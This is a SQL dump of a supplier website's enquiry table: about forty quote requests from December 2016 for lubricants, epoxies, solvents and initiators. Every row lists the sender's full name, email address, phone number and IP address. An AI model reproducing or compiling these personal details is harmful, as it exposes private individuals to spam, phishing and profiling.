INSERT INTO `wp_enquiry_detail_new` VALUES (287, 'Kim Mishos', 'kmishos@aeroparts.aero', 'Please quote Krytox 420AZ in .5 OZ syringes.\n\nThanks,\n\nKim', '(505) 891-6613', 'Krytox 240AZ', '206.190.79.74', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"638";s:5:"title";s:5:"240AZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_300460277.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-02 17:30:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (288, 'Kristina Mingo', 'kristina.mingo@mineralstech.com', 'Hi, \nMay I please have a price quote for the Vazo 64 material? \n\nThank you, \nKristina M. ', '(337) 354-1040', 'Vazo 64', '76.72.40.59', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"427";s:5:"title";s:7:"VAZO 64";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-64-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-02 20:51:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (289, 'Katherine Han', 'katherine.han@sunpowercorp.com', 'What is the cost of your aerosol spray can of acrylic conformal coating?', '(408) 240-5518', '', '208.54.35.223', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"733";s:5:"title";s:7:"MS-465C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-465C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-03 15:38:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (290, 'Darrell Stipp', 'dlstipp@att.net', 'I have a small project and would like to purchase a single can. Is that possible?', '(316) 648-9845', 'MS-470S availability single can', '162.230.62.172', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"190";s:5:"title";s:7:"MS-470S";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470S.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-04 00:20:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (291, 'Jerry McClendon', 'jerryleem.att@gmail.com', 'I am doing extensive art projects with resins and came across your site. Would like to know  more about your products and see if you have some that fit my specific needs. Thank you, Jerry McClendon', '(469) 644-4401', 'Bar Top and layer resins', '166.137.125.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-04 05:31:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (292, 'Warren Kalsow', 'PwdRacing@Yahoo.com', 'Interested in the oil for resale.', '(612) 801-7827', 'Krytox GPL 100 Oil', '24.197.221.96', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 02:03:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (293, 'pegaz', 'b.pegaz@reactolab.ch', 'Dear Madam/Sir\nI would like to have a quote for Krytox GPL100  0.5Kg.\nBest regards.\nB.PEGAZ', '', 'request', '85.0.127.216', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 09:30:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (294, 'Karen Ramos', 'kramos@reefaviation.com', 'Hello,\nKindly send me a quotation for 20 pcs of the 5 gallon size.\n\nThanks.', '+971 52 647 7113', 'Quotation', '94.206.15.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 12:31:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (295, 'Carson Tobias', 'ctobias@rosemedical.com', 'I am interested in 40148-A, is this the correct product? If so, could I please have a quote?\n\n', '', '', '50.199.37.18', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2344";s:5:"title";s:12:"Vertrel X-Si";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_470033000.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 13:01:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (296, 'Scott Johnson', 'Scott.johnson@o-i.com', 'If possible, need to if available in gallon liquid form and price. Thank you', '(510) 589-1924', 'Mold releae', '166.137.126.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:8:"MS-153BN";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 14:35:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (297, 'Aaron Stebbins', 'gf6156@wayne.edu', 'I\'m seeking an inquiry for EPON 828. Thanks.', '(313) 577-0837', 'Quote - EPON 828', '146.9.22.79', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 17:01:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (298, 'Matthew Dirmyer', 'mdirmyer@lanl.gov', 'Hi,\n\nI\'d like to purchase some MS-145W and would like info on pricing/Lots available/unit size?\n\nThanks,\nMatt Dirmyer', '(505) 665-1879', 'Availability', '192.12.184.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2312";s:5:"title";s:21:"MS-145W (Water-based)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_72669607.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 20:07:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (299, 'Xiaoxiao Hou', 'xiaoxiao_hou@brown.edu', 'Hello! I sent an inquiry last week but unfortunately I didn\'t receive your price quote through email. Do you mind sending me again? You could try both xiaoxiao_hou@brown.edu and xiaoxiao.hou.due@gmail.com.\n\nThanks!', '(401) 749-1074', 'Price inquiry for MS-722', '138.16.120.164', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1706";s:5:"title";s:10:"MS-720/722";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-720.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 20:57:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (300, 'Tim Hoffman', 'hoffman.tim@TIAXLLC.com', 'Please provide pricing for Krytox GPL-100 .5 Kg Bottle.\nThank you,\nTim', '(781) 862-0849', 'RFQ: Krytox GPL-100 .5 Kg Bottle', '209.6.4.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 21:51:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (301, 'Tobias Donnell', 'tdonnell4425@mytu.tuskegee.edu', 'Hello, I am requesting a quote for eight (8) 1-gallon bottles of Epon 862 as well as four (4) 1-gallon containers of Epikure-W.', '(334) 797-1706', 'EPON 862 and EPIKURE Quote', '75.143.116.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-05 22:43:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (302, 'Chintankumar Patel', 'chintankumar.patel@basf.com', 'I am interested in buying vazo 52 : 2,2\'-Azobis(2,4-dimethylvaleronitrile). I will appreciate if you may advise for the price of the same. My preferred purchase quantity would be 5 Kg. I will also appreciate if you may advise for even smaller size sample of the same.\n\nIn addition, I would like it to be delivered in Mangalore, India.\n\nPlease do the needful. ', '+91 824 223 7443', 'Vazo 52', '203.190.127.229', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"568";s:5:"title";s:7:"VAZO 52";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-06 09:40:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (303, 'Janiesch Jan', 'janiesch@is.mpg.de', 'hello \n\ni would like to know how much 0.5 kg of the 157 FSL and the 157 FSH oil costs.\n\nbest regards Jan Janiesch', '', '', '129.206.43.57', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-06 14:04:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (304, 'Matin Cox', 'mcox@ark-plas.com', 'Do you offer any discounts for bulk  in this lubricant?', '', 'Price', '67.224.114.34', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"784";s:5:"title";s:7:"GPL 203";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_295431182.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-06 14:25:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (305, 'Darrell Stipp', 'dlstipp@att.net', 'I sent a query last Saturday and received a promise that you would get back to me in a few hours. The follow up again stated that you would get back to me. I am still searching for a spray on conformal coating. But I only have small projects at a time.', '(316) 648-9845', 'Can I purchase one can of MS-470S?', '165.156.24.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"190";s:5:"title";s:7:"MS-470S";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470S.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-06 14:45:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (306, 'Greg Brown', 'gbrown@acmecryo.com', 'Please quote on aerosol cans of the 8oz Vertrel cleaning agent. We are interested in 12 cans or a case depending on the quantity. ', '(630) 240-6755', 'Vertrel MCA Cleaning Agent', '199.115.252.223', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-06 16:19:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (307, 'Matin Cox', 'mcox@ark-plas.com', 'I need a price quote.', '', '', '67.224.114.34', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1649";s:5:"title";s:13:"TriboSys 223X";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/tribosys-food-grade.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-06 16:49:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (308, 'Debbie Mlinek', 'dmlinek@tighitco.com', 'Can you please provide me the price of Vertrel SDG?  Also do you provide certifications to standards?  Do you know the shelf life for this product?', '', '', '66.155.183.218', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1268";s:5:"title";s:11:"Vertrel SDG";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-sdg-3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-07 14:06:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (309, 'JOHN MILLER', 'JOHN.MILLER@AIRGROUPAMERICA.COM', 'Please quote for a 50 kg / year use', '(724) 779-9500', 'KRYTOX 283AC (usually supplied in cans of 500g)', '24.101.185.107', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"655";s:5:"title";s:5:"283AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-grease-aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-07 14:41:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (310, 'Leonidas Panopoulos', 'lpanopoulos@nammotalley.com', 'I would like to request a quote for 1 Quart of MS-143XD', '(480) 898-2221', 'One quart of MS-143XD', '65.114.230.33', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:8:"MS-143XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-07 16:09:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (311, 'Robert', 'robertz@lubriloy.com', 'Hello, I\'m Robert from Lubri-Loy Company. Could you give me a quote on GPL105,106 and 107?\n\nThanks,\n\nRobert', '', '', '97.91.123.166', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"442";s:5:"title";s:7:"GPL 107";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-pfpe-oil-grease-gpl.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-07 22:30:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (312, 'Andrea Dorado', 'ameller@sandia.gov', 'How much would a 10lb cost? ', '', 'Quote for Opteon Sion', '134.253.19.214', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-08 15:36:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (313, 'Andrea Dorado', 'ameller@sandia.gov', 'How much would 10lb cost?', '', 'Price quote for Opteon Suprion', '134.253.19.214', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1344";s:5:"title";s:7:"Suprion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-suprion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-08 15:40:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (314, 'Andrea Dorado', 'ameller@sandia.gov', 'How much would 10 lbs cost?', '', 'Price quote for Vertrel MCA', '134.253.19.214', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-08 15:44:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (315, 'Anthony Andrasfay', 'aandrasfay10@outlook.com', 'Please let me know what small container (bottle) size MS-747 (Bulk Liquid) is available in to purchase. 8oz? 16oz? or other?\nThank you', '(760) 840-1420', 'Vertrel XSi Silicone Solvent', '108.83.10.85', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2344";s:5:"title";s:12:"Vertrel X-Si";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_470033000.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-08 19:34:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (316, 'James Wood', 'jwood@keyengco.com', 'Hello,\n\nI was hoping to get a price and lead time estimate for curing agent W. Please include quart and gallon pricing/lead time if possible.', '(562) 497-3265', 'RFQ Curing Agent W', '64.60.188.205', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-09 01:14:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (317, 'Dimo Yosifov', 'DYOSIFOV@TRIUMF.CA', 'could you please let me know what is the price for GPL 224?', '(604) 222-7524', 'price information', '142.90.86.140', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"847";s:5:"title";s:7:"GPL 224";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_95239273.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-09 21:26:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (318, 'Eric Cuthbert', 'umcuthb4@myumanitoba.ca', 'I\'d like to know what volumes I can get GPL205 for to the University of Manitoba, Winnipeg, MB, Canada and their prices.  Currently we order 57 g tubes but would like to know what other sizes are offered.\nEric', '', 'Volumes/Price', '130.179.244.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-09 23:16:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (319, 'Batric Pesic', 'pesic@uidaho.edu', 'Hello,\nHow fresh would be the epoxy if purchased from the vendors?\nDo you sell directly and what is price?\nAny minimum order?\nThanks.', '(208) 885-6569', 'Price ', '129.101.52.20', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-12 02:49:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (320, 'Ivan Preweda', 'ivan.w.preweda.civ@mail.mil', 'Can you provide a small engineering sample of your Epoxy 907.\nI\'m looking for an epoxy that\'s tough but not brittle for various electrical/mechanical applications. ', '(586) 808-5438', 'epoxy 907', '137.128.64.253', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-12 13:20:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (321, 'Junling Zhang', 'junling.zhang@ppg.com', 'Quote the price for one gallon Vertrel XF\n\nJunling Zhang\nVitro Glass LLC\n400 Guys Run Road,\nCheswick, PA 15024\n', '(412) 820-8667', 'Quote', '141.189.251.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-12 20:45:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (322, 'Ruthann', 'roconnor@mchale.net', 'Can you send me through some prices please based on qty 100 pieces per year, 1000 pcs, 2000 pcs. \n\nWhere can we purchase the lubricant from, do you sell direct?\n\nWe are an agricultural engineering manufacturer and are considering using the lubricant on the Amp connectors of our wiring looms.\n\nThanks,\nRuthann ', '', 'Connector Lubricant MS-124H', '192.168.1.176', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1673";s:5:"title";s:7:"MS-124H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-tribosys.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-13 11:25:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (323, 'Chad Bunk', 'cbunk@gapvax.com', 'we are a vehicle upfitter and my military background has me kind of hooked on your products ', '(814) 535-6766', 'price/vendor', '207.255.5.150', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1668";s:5:"title";s:8:"MS-381HC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-13 12:42:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (324, 'Roberto Loza', 'rloza@dynamicinst.com', 'Good afternoon.\nI\'m looking for a quote on the Urethane Conformal Coating, MS-470S\n1 box or 12 cans\nThank you\n', '(858) 810-7900', 'Quote/pricing', '70.164.112.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:7:"MS-470C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-13 20:58:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (325, 'Roger Guedes', 'rogerg@appliedcanada.com', 'Please quote me on a 1LB container of Krytox GPL-206.\n\nRoger Guedes\nApplied Industrial Technologies\nCranbrook, BC  Canada', '(250) 426-4255', 'Krytox GPL-206', '12.46.184.20', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-14 16:02:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (326, 'Stephen  whetstone', 's.whetstone@aqginc.com', 'Have been using your  product and might need more of it.  Quantities and prices would be great.  Thanks.  ', '(205) 292-5640', 'Gpl226  1kg', '104.182.47.57', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-15 00:00:09', '', NULL, '', '', '', NULL, '', ''); 
